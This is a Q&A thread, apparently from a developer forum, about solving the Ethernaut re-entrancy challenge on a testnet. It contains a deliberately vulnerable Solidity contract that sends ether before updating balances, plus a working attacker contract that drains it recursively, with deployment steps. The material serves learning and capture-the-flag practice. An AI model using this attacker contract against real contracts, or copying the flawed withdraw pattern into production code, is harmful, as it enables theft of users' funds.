# reentrancy code not executing due to gas error on remix

Tags: ethereum, solidity, smartcontracts

I am working through the ethernaut challenge re-entrancy: https://ethernaut.openzeppelin.com/level/0xe6BA07257a9321e755184FB2F995e0600E78c16D
I think I have hit tunnel vision as I keep getting this error on remix and I really don't know why:

```
    Gas estimation errored with the following message (see below). The transaction execution will likely fail. Do you want to force sending?
execution reverted
```

here is the code I have made to attack the contract:

```
    pragma solidity ^0.8.0;
import "./vic.sol";


contract getether{

    Reentrance public reenter;
    
    constructor(address payable _victim){
        reenter = Reentrance(_victim);
    }

    function start() public {
        reenter.donate{value : 0.001 ether, gas : 4000000}(address(this));
    
    }

    fallback() external payable {
        if(address(reenter).balance != 0){
        reenter.withdraw(0.001 ether);
        }
    }
}
```

Thanks in advance

Comment: you should try to send the transaction anyway to see the actual error

Comment: false Transaction mined but execution failed it says on the log

Comment: if you are trying on a test net add the link of the tx in the block explorer

Comment: also, can you add the code of vic.sol?

Comment: Apologies for the late reply,  here is the link:https://rinkeby.etherscan.io/tx/0xa496ed07a117a71086a8c4d20000dd9190429a20d1cb68eb1e00acb2c40b6ca1 also vic.sol is just this code: https://ethernaut.openzeppelin.com/level/0xe6BA07257a9321e755184FB2F995e0600E78c16D with version ^0.8.0, I use it to reference the original contract

Comment: I was able to solve it and follow this https://ethereum.stackexchange.com/questions/128811/unable-to-make-re-entrancy-attack-using-solidity-code-ethernaut-openzeppelin/129034#129034

Answer (score 3, accepted):

## Steps

### 1. Create in remix **vic.sol**

(code from [Ethernaut re-entrance level](https://ethernaut.openzeppelin.com/level/0xe6BA07257a9321e755184FB2F995e0600E78c16D). I only changed math.sol import)

```
    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    import 'https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/utils/math/SafeMath.sol';

    contract Reentrance {
      
      using SafeMath for uint256;
      mapping(address => uint) public balances;

      function donate(address _to) public payable {
        balances[_to] = balances[_to].add(msg.value);
      }

      function balanceOf(address _who) public view returns (uint balance) {
        return balances[_who];
      }

      function withdraw(uint _amount) public {
        if(balances[msg.sender] >= _amount) {
          (bool result,) = msg.sender.call{value:_amount}("");
          if(result) {
            _amount;
          }
          balances[msg.sender] -= _amount;
        }
      }

      receive() external payable {}
    }
```

### 2. Deploy in Rinkeby vic.sol

Deploy in Rinkeby vic.sol, using some account (called account 1) from Metamask.

Another options: deploy contract in Rinkeby, from Ethernaut site, using "Get new instance" button and console (I think that you already know that)

You could see my deployed contract [here](https://rinkeby.etherscan.io/address/0x4Ab360237190A44fDfa803583f3A63d9Ac9c2a99).
(It was deployed from the Ethernaut site)

### 3. Import in remix contract created in 2 (vic.sol)

Once the transaction from the previous point is finished, take contract's address and import in remix (field "at address").

### 4. Send ethers to contract created in 1 (vic.sol)

With account 1, send **1 ether** to contract vic.sol.
Use "*donate*" method and put contract address (created in 1) as "*address_to*" parameter.

[image]

### 5. Create in remix **attack.sol**

Important notes:

- use another account in Metamask (different to account 1)
- Put in "address_victim" the vic.sol address

```
  // SPDX-License-Identifier: MIT
  pragma solidity ^0.8.0;

  import "./vic.sol";

  contract ReentranceAttacker {
      Reentrance public reenter;
      uint256 initialDeposit;

      constructor(address payable _victim) {
          reenter = Reentrance(payable(_victim));
      }

      function attack() external payable {
          require(msg.value >= 1 ether, "send >= 1 ether");

          // first deposit some funds
          initialDeposit = msg.value;
          reenter.donate{value: initialDeposit}(address(this));

          // withdraw these funds over and over again because of re-entrancy issue
          callWithdraw();
      }

      receive() external payable {
          // re-entrance called by reenter
          callWithdraw();
      }

      function callWithdraw() private {
          // this balance correctly updates after withdraw
          uint256 challengeTotalRemainingBalance = address(reenter).balance;
          // are there more tokens to empty?
          bool keepRecursing = challengeTotalRemainingBalance > 0;

          if (keepRecursing) {
              // can only withdraw at most our initial balance per withdraw call
              uint256 toWithdraw =
                  initialDeposit < challengeTotalRemainingBalance
                      ? initialDeposit
                      : challengeTotalRemainingBalance;
              reenter.withdraw(toWithdraw);
          }
      }
  }
```

### 6. Deploy attack.sol to Rinkeby

Deploy attack.sol to Rinkeby.
See my contract deployed [here](https://rinkeby.etherscan.io/address/0x121862dF7815CA179ab59f8Ead2dd993f9e3bDd5).

### 7. Attack contract

Put 1 ether in value and press "attack" in deployed contract attack.sol.

When transaction is finished, you'll see 2.001 ethers in contract (attack.sol) balance and 0 ethers y vic.sol balance.

attack contract balance:
[image]

vic contract balance:
[image]

Notes about "2.001 ethers":

- 0.001 from Ethernaut (when deploy contract with "Get new instance" button, they transfer that value to contract)
- 1 ether from victim
- 1 ether from attacker (you)

And that's all. You could see that contracts works:
(submit solution to Ethernaut)

[image]